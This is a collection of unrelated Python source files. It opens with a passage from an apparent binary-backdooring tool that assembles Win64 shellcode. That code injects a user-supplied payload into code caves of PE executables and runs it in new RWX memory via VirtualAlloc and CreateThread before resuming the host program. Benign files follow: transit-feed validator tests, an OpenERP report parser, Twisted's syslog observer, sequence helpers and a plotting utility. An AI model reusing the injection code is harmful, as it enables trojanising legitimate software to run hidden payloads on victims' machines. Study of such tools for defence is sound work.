#overloading stackpreserve
self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
if flItms['supplied_shellcode'] is None:
print "[!] User must provide shellcode for this module (-U)"
return False
else:
self.supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
breakupvar = eat_code_caves(flItms, 0, 1)
#get_payload: #Jump back with the address for the payload on the stack.
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 99).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 99).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 71).rstrip('L')), 16))
else:
self.shellcode2 = "\xE8\xBA\xFF\xFF\xFF"
#Can inject any shellcode below.
if flItms['NewCodeCave'] is False:
if CavesPicked != {}:
self.shellcode2 += self.clean_caves_stub(flItms['CavesToFix'])
else:
self.shellcode2 += "\x41" * 90
self.shellcode2 += self.supplied_shellcode
breakupvar = eat_code_caves(flItms, 0, 1)
#allocate
self.shellcode1 = "\xfc"
self.shellcode1 += "\x49\xBE" # mov value below to r14
if flItms['VirtualAlloc'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<Q", 0xffffffff + (flItms['VirtualAlloc'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<Q", flItms['VirtualAlloc'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
# RDX holds entry point
self.shellcode1 += "\x49\x01\xD6" # add r14 + RDX
self.shellcode1 += "\x49\xBF" # mov value below to r15
if flItms['CreateThread'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<Q", 0xffffffff + (flItms['CreateThread'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<Q", flItms['CreateThread'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
self.shellcode1 += "\x49\x01\xD7" # add r15 + RDX
# r14 virtualalloc
# r15 createthread
self.shellcode1 += ("\x5d" # pop rbp
"\x49\xc7\xc5" # mov r13, size of payload...
)
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
self.shellcode1 += ("\x6a\x40" # push 40h
"\x41\x59" # pop r9 now 40h
"\x68\x00\x10\x00\x00" # push 1000h
"\x41\x58" # pop r8.. now 1000h
"\x4C\x89\xEA" # mov rdx, r13
"\x6A\x00" # push 0
"\x59" # pop rcx
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x16" # call qword ptr [r14]
"\x48\x89\xc3" # mov rbx, rax ; Store allocated address in rbx
"\x48\x89\xc7" # mov rdi, rax ; Prepare RDI with the new address
)
self.shellcode1 += "\x48\xc7\xc1"
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
#call the get_payload right before the payload
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x41"
# got_payload:
self.shellcode1 += ("\x5e" # pop rsi ; Prepare ESI with the source to copy
"\xf2\xa4" # rep movsb ; Copy the payload to RWX memory
"\xe8\x00\x00\x00\x00" # call set_handler ; Configure error handling
#^^^^ I could delete this need to fix jmp, call, and stack
#set_handler:
"\x48\x31\xC0" # xor rax,rax
"\x50" # push rax ; LPDWORD lpThreadId (NULL)
"\x50" # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" # mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
"\x49\x89\xD8" # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" # mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15]
"\x48\x83\xC4\x50" # add rsp, 50
#stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
)
breakupvar = eat_code_caves(flItms, 0, 2)
#Jump to the win64 return to normal execution code segment.
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip('L')), 16))
else:
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def cave_miner_inline(self, flItms, CavesPicked={}):
"""
Sample code for finding sutable code caves
"""
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ""
if flItms['cave_jumping'] is True:
if breakupvar > 0:
self.shellcode1 += "\xe9"
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar -
len(self.stackpreserve) - len(self.shellcode1) - 3)
#else:
# self.shellcode1 += "\xc0\x00\x00\x00"
self.shellcode1 += ("\x90" * 13)
self.shellcode2 = ("\x90" * 19)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
##########################################################
# END win64 shellcodes #
##########################################################
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/python2.5
# Copyright (C) 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Smoke tests feed validator. Make sure it runs and returns the right things
# for a valid feed and a feed with errors.
import datetime
import feedvalidator
import os.path
import re
import StringIO
import transitfeed
import unittest
from urllib2 import HTTPError, URLError
import urllib2
import util
import zipfile
class FullTests(util.TempDirTestCaseBase):
feedvalidator_executable = 'feedvalidator.py'
extension_message = 'FeedValidator extension used: '
extension_name = 'None'
additional_arguments = []
def testGoodFeed(self):
(out, err) = self.CheckCallWithPath(
[self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
transitfeed.__version__] + self.additional_arguments +
[self.GetPath('test', 'data', 'good_feed')])
self.assertTrue(re.search(r'feed validated successfully', out))
self.assertFalse(re.search(r'ERROR', out))
htmlout = open('validation-results.html').read()
self.assertMatchesRegex(
self.extension_message + self.extension_name, htmlout)
self.assertTrue(re.search(r'feed validated successfully', htmlout))
self.assertFalse(re.search(r'ERROR', htmlout))
self.assertFalse(os.path.exists('transitfeedcrash.txt'))
def testGoodFeedConsoleOutput(self):
(out, err) = self.CheckCallWithPath(
[self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
transitfeed.__version__] + self.additional_arguments +
['--output=CONSOLE', self.GetPath('test', 'data', 'good_feed')])
self.assertTrue(re.search(r'feed validated successfully', out))
self.assertMatchesRegex(
self.extension_message + self.extension_name, out)
self.assertFalse(re.search(r'ERROR', out))
self.assertFalse(os.path.exists('validation-results.html'))
self.assertFalse(os.path.exists('transitfeedcrash.txt'))
def testMissingStops(self):
(out, err) = self.CheckCallWithPath(
[self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
transitfeed.__version__] + self.additional_arguments +
[self.GetPath('test', 'data', 'missing_stops')],
expected_retcode=1)
self.assertTrue(re.search(r'ERROR', out))
self.assertFalse(re.search(r'feed validated successfully', out))
htmlout = open('validation-results.html').read()
self.assertMatchesRegex(
self.extension_message + self.extension_name, htmlout)
self.assertTrue(re.search(r'Invalid value BEATTY_AIRPORT', htmlout))
self.assertFalse(re.search(r'feed validated successfully', htmlout))
self.assertFalse(os.path.exists('transitfeedcrash.txt'))
def testMissingStopsConsoleOutput(self):
(out, err) = self.CheckCallWithPath(
[self.GetPath(self.feedvalidator_executable), '-n', '-o', 'console',
'--latest_version', transitfeed.__version__] +
self.additional_arguments +
[self.GetPath('test', 'data', 'missing_stops')],
expected_retcode=1)
self.assertMatchesRegex(
self.extension_message + self.extension_name, out)
self.assertTrue(re.search(r'ERROR', out))
self.assertFalse(re.search(r'feed validated successfully', out))
self.assertTrue(re.search(r'Invalid value BEATTY_AIRPORT', out))
self.assertFalse(os.path.exists('validation-results.html'))
self.assertFalse(os.path.exists('transitfeedcrash.txt'))
def testLimitedErrors(self):
(out, err) = self.CheckCallWithPath(
[self.GetPath(self.feedvalidator_executable), '-l', '2', '-n',
'--latest_version', transitfeed.__version__] +
self.additional_arguments +
[self.GetPath('test', 'data', 'missing_stops')],
expected_retcode=1)
self.assertTrue(re.search(r'ERROR', out))
self.assertFalse(re.search(r'feed validated successfully', out))
htmlout = open('validation-results.html').read()
self.assertMatchesRegex(
self.extension_message + self.extension_name, htmlout)
self.assertEquals(2, len(re.findall(r'class="problem">stop_id<', htmlout)))
self.assertFalse(os.path.exists('transitfeedcrash.txt'))
def testBadDateFormat(self):
(out, err) = self.CheckCallWithPath(
[self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
transitfeed.__version__] + self.additional_arguments +
[self.GetPath('test', 'data', 'bad_date_format')],
expected_retcode=1)
self.assertTrue(re.search(r'ERROR', out))
self.assertFalse(re.search(r'feed validated successfully', out))
htmlout = open('validation-results.html').read()
self.assertMatchesRegex(
self.extension_message + self.extension_name, htmlout)
self.assertTrue(re.search(r'in field <code>start_date', htmlout))
self.assertTrue(re.search(r'in field <code>date', htmlout))
self.assertFalse(re.search(r'feed validated successfully', htmlout))
self.assertFalse(os.path.exists('transitfeedcrash.txt'))
def testBadUtf8(self):
(out, err) = self.CheckCallWithPath(
[self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
transitfeed.__version__] + self.additional_arguments +
[self.GetPath('test', 'data', 'bad_utf8')],
expected_retcode=1)
self.assertTrue(re.search(r'ERROR', out))
self.assertFalse(re.search(r'feed validated successfully', out))
htmlout = open('validation-results.html').read()
self.assertMatchesRegex(
self.extension_message + self.extension_name, htmlout)
self.assertTrue(re.search(r'Unicode error', htmlout))
self.assertFalse(re.search(r'feed validated successfully', htmlout))
self.assertFalse(os.path.exists('transitfeedcrash.txt'))
def testFileNotFound(self):
(out, err) = self.CheckCallWithPath(
[self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
transitfeed.__version__, 'file-not-found.zip'],
expected_retcode=1)
self.assertFalse(os.path.exists('transitfeedcrash.txt'))
def testBadOutputPath(self):
(out, err) = self.CheckCallWithPath(
[self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
transitfeed.__version__, '-o', 'path/does/not/exist.html',
self.GetPath('test', 'data', 'good_feed')],
expected_retcode=2)
self.assertFalse(os.path.exists('transitfeedcrash.txt'))
def testCrashHandler(self):
(out, err) = self.CheckCallWithPath(
[self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
transitfeed.__version__] + self.additional_arguments +
['IWantMyvalidation-crash.txt'],
expected_retcode=127)
self.assertTrue(re.search(r'Yikes', out))
self.assertFalse(re.search(r'feed validated successfully', out))
crashout = open('transitfeedcrash.txt').read()
self.assertTrue(re.search(r'For testing the feed validator crash handler',
crashout))
def testCheckVersionIsRun(self):
(out, err) = self.CheckCallWithPath(
[self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
'100.100.100'] + self.additional_arguments +
[self.GetPath('test', 'data', 'good_feed')])
self.assertTrue(re.search(r'feed validated successfully', out))
self.assertTrue(re.search(r'A new version 100.100.100', out))
htmlout = open('validation-results.html').read()
self.assertMatchesRegex(
self.extension_message + self.extension_name, htmlout)
self.assertTrue(re.search(r'A new version 100.100.100', htmlout))
self.assertFalse(re.search(r'ERROR', htmlout))
self.assertFalse(os.path.exists('transitfeedcrash.txt'))
def testCheckVersionIsRunConsoleOutput(self):
(out, err) = self.CheckCallWithPath(
[self.GetPath(self.feedvalidator_executable), '-n', '-o', 'console',
'--latest_version=100.100.100'] + self.additional_arguments +
[self.GetPath('test', 'data', 'good_feed')])
self.assertTrue(re.search(r'feed validated successfully', out))
self.assertTrue(re.search(r'A new version 100.100.100', out))
self.assertFalse(os.path.exists('validation-results.html'))
self.assertFalse(os.path.exists('transitfeedcrash.txt'))
def testUsage(self):
(out, err) = self.CheckCallWithPath(
[self.GetPath(self.feedvalidator_executable), '--invalid_opt'],
expected_retcode=2)
self.assertMatchesRegex(r'[Uu]sage: feedvalidator(.*).py \[options\]', err)
self.assertMatchesRegex(r'wiki/FeedValidator', err)
self.assertMatchesRegex(r'--output', err) # output includes all usage info
self.assertFalse(os.path.exists('transitfeedcrash.txt'))
self.assertFalse(os.path.exists('validation-results.html'))
# Regression tests to ensure that CalendarSummary works properly
# even when the feed starts in the future or expires in less than
# 60 days
# See http://code.google.com/p/googletransitdatafeed/issues/detail?id=204
class CalendarSummaryTestCase(util.TestCase):
# Test feeds starting in the future
def testFutureFeedDoesNotCrashCalendarSummary(self):
today = datetime.date.today()
start_date = today + datetime.timedelta(days=20)
end_date = today + datetime.timedelta(days=80)
schedule = transitfeed.Schedule()
service_period = schedule.GetDefaultServicePeriod()
service_period.SetStartDate(start_date.strftime("%Y%m%d"))
service_period.SetEndDate(end_date.strftime("%Y%m%d"))
service_period.SetWeekdayService(True)
result = feedvalidator.CalendarSummary(schedule)
self.assertEquals(0, result['max_trips'])
self.assertEquals(0, result['min_trips'])
self.assertTrue(re.search("40 service dates", result['max_trips_dates']))
# Test feeds ending in less than 60 days
def testShortFeedDoesNotCrashCalendarSummary(self):
start_date = datetime.date.today()
end_date = start_date + datetime.timedelta(days=15)
schedule = transitfeed.Schedule()
service_period = schedule.GetDefaultServicePeriod()
service_period.SetStartDate(start_date.strftime("%Y%m%d"))
service_period.SetEndDate(end_date.strftime("%Y%m%d"))
service_period.SetWeekdayService(True)
result = feedvalidator.CalendarSummary(schedule)
self.assertEquals(0, result['max_trips'])
self.assertEquals(0, result['min_trips'])
self.assertTrue(re.search("15 service dates", result['max_trips_dates']))
# Test feeds starting in the future *and* ending in less than 60 days
def testFutureAndShortFeedDoesNotCrashCalendarSummary(self):
today = datetime.date.today()
start_date = today + datetime.timedelta(days=2)
end_date = today + datetime.timedelta(days=3)
schedule = transitfeed.Schedule()
service_period = schedule.GetDefaultServicePeriod()
service_period.SetStartDate(start_date.strftime("%Y%m%d"))
service_period.SetEndDate(end_date.strftime("%Y%m%d"))
service_period.SetWeekdayService(True)
result = feedvalidator.CalendarSummary(schedule)
self.assertEquals(0, result['max_trips'])
self.assertEquals(0, result['min_trips'])
self.assertTrue(re.search("1 service date", result['max_trips_dates']))
# Test feeds without service days
def testFeedWithNoDaysDoesNotCrashCalendarSummary(self):
schedule = transitfeed.Schedule()
result = feedvalidator.CalendarSummary(schedule)
self.assertEquals({}, result)
class MockOptions:
"""Pretend to be an optparse options object suitable for testing."""
def __init__(self):
self.limit_per_type = 5
self.memory_db = True
self.check_duplicate_trips = True
self.latest_version = transitfeed.__version__
self.output = 'fake-filename.zip'
self.manual_entry = False
self.service_gap_interval = None
self.extension = None
self.error_types_ignore_list = None
class FeedValidatorTestCase(util.TempDirTestCaseBase):
def testBadEolContext(self):
"""Make sure the filename is included in the report of a bad eol."""
filename = "routes.txt"
old_zip = zipfile.ZipFile(
self.GetPath('test', 'data', 'good_feed.zip'), 'r')
content_dict = self.ConvertZipToDict(old_zip)
old_routes = content_dict[filename]
new_routes = old_routes.replace('\n', '\r\n', 1)
self.assertNotEquals(old_routes, new_routes)
content_dict[filename] = new_routes
new_zipfile_mem = self.ConvertDictToZip(content_dict)
options = MockOptions()
output_file = StringIO.StringIO()
feedvalidator.RunValidationOutputToFile(
new_zipfile_mem, options, output_file)
self.assertMatchesRegex(filename, output_file.getvalue())
class LimitPerTypeProblemReporterTestCase(util.TestCase):
def CreateLimitPerTypeProblemReporter(self, limit):
accumulator = feedvalidator.LimitPerTypeProblemAccumulator(limit)
problems = transitfeed.ProblemReporter(accumulator)
return problems
def assertProblemsAttribute(self, problem_type, class_name, attribute_name,
expected):
"""Join the value of each exception's attribute_name in order."""
problem_attribute_list = []
for e in self.problems.GetAccumulator().ProblemList(
problem_type, class_name).problems:
problem_attribute_list.append(getattr(e, attribute_name))
self.assertEquals(expected, " ".join(problem_attribute_list))
def testLimitOtherProblems(self):
"""The first N of each type should be kept."""
self.problems = self.CreateLimitPerTypeProblemReporter(2)
self.accumulator = self.problems.GetAccumulator()
self.problems.OtherProblem("e1", type=transitfeed.TYPE_ERROR)
self.problems.OtherProblem("w1", type=transitfeed.TYPE_WARNING)
self.problems.OtherProblem("e2", type=transitfeed.TYPE_ERROR)
self.problems.OtherProblem("e3", type=transitfeed.TYPE_ERROR)
self.problems.OtherProblem("w2", type=transitfeed.TYPE_WARNING)
self.assertEquals(2, self.accumulator.WarningCount())
self.assertEquals(3, self.accumulator.ErrorCount())
# These are BoundedProblemList objects
warning_bounded_list = self.accumulator.ProblemList(
transitfeed.TYPE_WARNING, "OtherProblem")
error_bounded_list = self.accumulator.ProblemList(
transitfeed.TYPE_ERROR, "OtherProblem")
self.assertEquals(2, warning_bounded_list.count)
self.assertEquals(3, error_bounded_list.count)
self.assertEquals(0, warning_bounded_list.dropped_count)
self.assertEquals(1, error_bounded_list.dropped_count)
self.assertProblemsAttribute(transitfeed.TYPE_ERROR, "OtherProblem",
"description", "e1 e2")
self.assertProblemsAttribute(transitfeed.TYPE_WARNING, "OtherProblem",
"description", "w1 w2")
def testKeepUnsorted(self):
"""An imperfect test that insort triggers ExceptionWithContext.__cmp__."""
# If ExceptionWithContext.__cmp__ doesn't trigger TypeError in
# bisect.insort then the default comparison of object id will be used. The
# id values tend to be given out in order of creation so call
# problems._Report with objects in a different order. This test should
# break if ExceptionWithContext.__cmp__ is removed or changed to return 0
# or cmp(id(self), id(y)).
exceptions = []
for i in range(20):
exceptions.append(transitfeed.OtherProblem(description="e%i" % i))
exceptions = exceptions[10:] + exceptions[:10]
self.problems = self.CreateLimitPerTypeProblemReporter(3)
self.accumulator = self.problems.GetAccumulator()
for e in exceptions:
self.problems.AddToAccumulator(e)
self.assertEquals(0, self.accumulator.WarningCount())
self.assertEquals(20, self.accumulator.ErrorCount())
bounded_list = self.accumulator.ProblemList(
transitfeed.TYPE_ERROR, "OtherProblem")
self.assertEquals(20, bounded_list.count)
self.assertEquals(17, bounded_list.dropped_count)
self.assertProblemsAttribute(transitfeed.TYPE_ERROR, "OtherProblem",
"description", "e10 e11 e12")
def testLimitSortedTooFastTravel(self):
"""Sort by decreasing distance, keeping the N greatest."""
self.problems = self.CreateLimitPerTypeProblemReporter(3)
self.accumulator = self.problems.GetAccumulator()
self.problems.TooFastTravel("t1", "prev stop", "next stop", 11230.4, 5,
None)
self.problems.TooFastTravel("t2", "prev stop", "next stop", 1120.4, 5, None)
self.problems.TooFastTravel("t3", "prev stop", "next stop", 1130.4, 5, None)
self.problems.TooFastTravel("t4", "prev stop", "next stop", 1230.4, 5, None)
self.assertEquals(0, self.accumulator.WarningCount())
self.assertEquals(4, self.accumulator.ErrorCount())
self.assertProblemsAttribute(transitfeed.TYPE_ERROR, "TooFastTravel",
"trip_id", "t1 t4 t3")
def testLimitSortedStopTooFarFromParentStation(self):
"""Sort by decreasing distance, keeping the N greatest."""
self.problems = self.CreateLimitPerTypeProblemReporter(3)
self.accumulator = self.problems.GetAccumulator()
for i, distance in enumerate((1000, 3002.0, 1500, 2434.1, 5023.21)):
self.problems.StopTooFarFromParentStation(
"s%d" % i, "S %d" % i, "p%d" % i, "P %d" % i, distance)
self.assertEquals(5, self.accumulator.WarningCount())
self.assertEquals(0, self.accumulator.ErrorCount())
self.assertProblemsAttribute(transitfeed.TYPE_WARNING,
"StopTooFarFromParentStation", "stop_id", "s4 s1 s3")
def testLimitSortedStopsTooClose(self):
"""Sort by increasing distance, keeping the N closest."""
self.problems = self.CreateLimitPerTypeProblemReporter(3)
self.accumulator = self.problems.GetAccumulator()
for i, distance in enumerate((4.0, 3.0, 2.5, 2.2, 1.0, 0.0)):
self.problems.StopsTooClose(
"Sa %d" % i, "sa%d" % i, "Sb %d" % i, "sb%d" % i, distance)
self.assertEquals(6, self.accumulator.WarningCount())
self.assertEquals(0, self.accumulator.ErrorCount())
self.assertProblemsAttribute(transitfeed.TYPE_WARNING,
"StopsTooClose", "stop_id_a", "sa5 sa4 sa3")
class CheckVersionTestCase(util.TempDirTestCaseBase):
def setUp(self):
self.mock = MockURLOpen()
def tearDown(self):
self.mock = None
feedvalidator.urlopen = urllib2.urlopen
def testAssignedDifferentVersion(self):
problems = feedvalidator.CheckVersion('100.100.100')
self.assertTrue(re.search(r'A new version 100.100.100', problems))
def testAssignedSameVersion(self):
problems = feedvalidator.CheckVersion(transitfeed.__version__)
self.assertEquals(problems, None)
def testGetCorrectReturns(self):
feedvalidator.urlopen = self.mock.mockedConnectSuccess
problems = feedvalidator.CheckVersion()
self.assertTrue(re.search(r'A new version 100.0.1', problems))
def testPageNotFound(self):
feedvalidator.urlopen = self.mock.mockedPageNotFound
problems = feedvalidator.CheckVersion()
self.assertTrue(re.search(r'The server couldn\'t', problems))
self.assertTrue(re.search(r'Error code: 404', problems))
def testConnectionTimeOut(self):
feedvalidator.urlopen = self.mock.mockedConnectionTimeOut
problems = feedvalidator.CheckVersion()
self.assertTrue(re.search(r'We failed to reach', problems))
self.assertTrue(re.search(r'Reason: Connection timed', problems))
def testGetAddrInfoFailed(self):
feedvalidator.urlopen = self.mock.mockedGetAddrInfoFailed
problems = feedvalidator.CheckVersion()
self.assertTrue(re.search(r'We failed to reach', problems))
self.assertTrue(re.search(r'Reason: Getaddrinfo failed', problems))
def testEmptyIsReturned(self):
feedvalidator.urlopen = self.mock.mockedEmptyIsReturned
problems = feedvalidator.CheckVersion()
self.assertTrue(re.search(r'We had trouble parsing', problems))
class MockURLOpen:
"""Pretend to be a urllib2.urlopen suitable for testing."""
def mockedConnectSuccess(self, request):
return StringIO.StringIO('<li><a href="transitfeed-1.0.0/">transitfeed-'
'1.0.0/</a></li><li><a href=transitfeed-100.0.1/>'
'transitfeed-100.0.1/</a></li>')
def mockedPageNotFound(self, request):
raise HTTPError(request.get_full_url(), 404, 'Not Found',
request.header_items(), None)
def mockedConnectionTimeOut(self, request):
raise URLError('Connection timed out')
def mockedGetAddrInfoFailed(self, request):
raise URLError('Getaddrinfo failed')
def mockedEmptyIsReturned(self, request):
return StringIO.StringIO()
if __name__ == '__main__':
unittest.main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import pooler
import time
from openerp.report import report_sxw
class workcenter_code(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(workcenter_code, self).__init__(cr, uid, name, context=context)
self.localcontext.update({
'time': time,
})
report_sxw.report_sxw('report.mrp.wc.barcode', 'mrp.workcenter', 'addons/mrp_operations/report/mrp_wc_barcode.rml',parser=workcenter_code,header=False)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- test-case-name: twisted.python.test.test_syslog -*-
# Copyright (c) 2001-2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Classes and utility functions for integrating Twisted and syslog.
You probably want to call L{startLogging}.
"""
syslog = __import__('syslog')
from twisted.python import log
# These defaults come from the Python 2.3 syslog docs.
DEFAULT_OPTIONS = 0
DEFAULT_FACILITY = syslog.LOG_USER
class SyslogObserver:
"""
A log observer for logging to syslog.
See L{twisted.python.log} for context.
This logObserver will automatically use LOG_ALERT priority for logged
failures (such as from C{log.err()}), but you can use any priority and
facility by setting the 'C{syslogPriority}' and 'C{syslogFacility}' keys in
the event dict.
"""
openlog = syslog.openlog
syslog = syslog.syslog
def __init__(self, prefix, options=DEFAULT_OPTIONS,
facility=DEFAULT_FACILITY):
"""
@type prefix: C{str}
@param prefix: The syslog prefix to use.
@type options: C{int}
@param options: A bitvector represented as an integer of the syslog
options to use.
@type facility: C{int}
@param facility: An indication to the syslog daemon of what sort of
program this is (essentially, an additional arbitrary metadata
classification for messages sent to syslog by this observer).
"""
self.openlog(prefix, options, facility)
def emit(self, eventDict):
"""
Send a message event to the I{syslog}.
@param eventDict: The event to send. If it has no C{'message'} key, it
will be ignored. Otherwise, if it has C{'syslogPriority'} and/or
C{'syslogFacility'} keys, these will be used as the syslog priority
and facility. If it has no C{'syslogPriority'} key but a true
value for the C{'isError'} key, the B{LOG_ALERT} priority will be
used; if it has a false value for C{'isError'}, B{LOG_INFO} will be
used. If the C{'message'} key is multiline, each line will be sent
to the syslog separately.
"""
# Figure out what the message-text is.
text = log.textFromEventDict(eventDict)
if text is None:
return
# Figure out what syslog parameters we might need to use.
priority = syslog.LOG_INFO
facility = 0
if eventDict['isError']:
priority = syslog.LOG_ALERT
if 'syslogPriority' in eventDict:
priority = int(eventDict['syslogPriority'])
if 'syslogFacility' in eventDict:
facility = int(eventDict['syslogFacility'])
# Break the message up into lines and send them.
lines = text.split('\n')
while lines[-1:] == ['']:
lines.pop()
firstLine = True
for line in lines:
if firstLine:
firstLine = False
else:
line = '\t' + line
self.syslog(priority | facility,
'[%s] %s' % (eventDict['system'], line))
def startLogging(prefix='Twisted', options=DEFAULT_OPTIONS,
facility=DEFAULT_FACILITY, setStdout=1):
"""
Send all Twisted logging output to syslog from now on.
The prefix, options and facility arguments are passed to
C{syslog.openlog()}, see the Python syslog documentation for details. For
other parameters, see L{twisted.python.log.startLoggingWithObserver}.
"""
obs = SyslogObserver(prefix, options, facility)
log.startLoggingWithObserver(obs.emit, setStdout=setStdout)
|
unknown
|
codeparrot/codeparrot-clean
| ||
import string
class predictions(object):
def __init__(self, positions=None, scores=None):
self.positions=positions
self.scores=scores
def set_positions(self, positions):
self.positions=positions;
def get_positions(self):
return self.positions
def set_scores(self, scores):
self.scores=scores
def get_scores(self):
return self.scores
def __str__(self):
return 'positions: ' + `self.positions` + 'scores: ' + `self.scores`
def __repr__(self):
return self.__str__()
class sequence(object):
def __init__(self, name, seq, (start,end)):
assert(start<end<len(seq))
self.start=start
self.end=end
self.name=name
self.seq=seq
self.preds=dict()
self.preds['acceptor']=predictions()
self.preds['donor']=predictions()
def __str__(self):
s="start:" + `self.start`
s+=" end:" + `self.end`
s+=" name:" + `self.name`
s+=" sequence:" + `self.seq[0:10]`
s+="... preds:" + `self.preds`
return s
def __repr__(self):
return self.__str__()
def seqdict(dic, (start,end)):
""" takes a fasta dict as input and
generates a list of sequence objects from it """
sequences=list()
#translate string to ACGT / all non ACGT letters are mapped to A
tab=''
for i in xrange(256):
if chr(i).upper() in 'ACGT':
tab+=chr(i).upper()
else:
tab+='A'
for seqname in dic.ordered_items():
seq=string.translate(seqname[1], tab)
seq=seq.upper()
if end<0:
stop=len(seq)+end
else:
stop=end
sequences.append(sequence(seqname[0], seq, (start,stop)))
return sequences
|
unknown
|
codeparrot/codeparrot-clean
| ||
import pylab
import numpy as np
import pymc
import matplotlib.patches
from mpl_toolkits.axes_grid1 import make_axes_locatable
import scipy.stats
def frac_inside_poly(x,y,polyxy):
"""Calculate the fraction of points x,y inside polygon polyxy.
polyxy -- list of x,y coordinates of vertices.
"""
xy = np.vstack([x,y]).transpose()
return float(sum(matplotlib.nxutils.points_inside_poly(xy, polyxy)))/len(x)
def fracs_inside_contours(x, y, contours):
"""Calculate the fraction of points x,y inside each contour level.
contours -- a matplotlib.contour.QuadContourSet
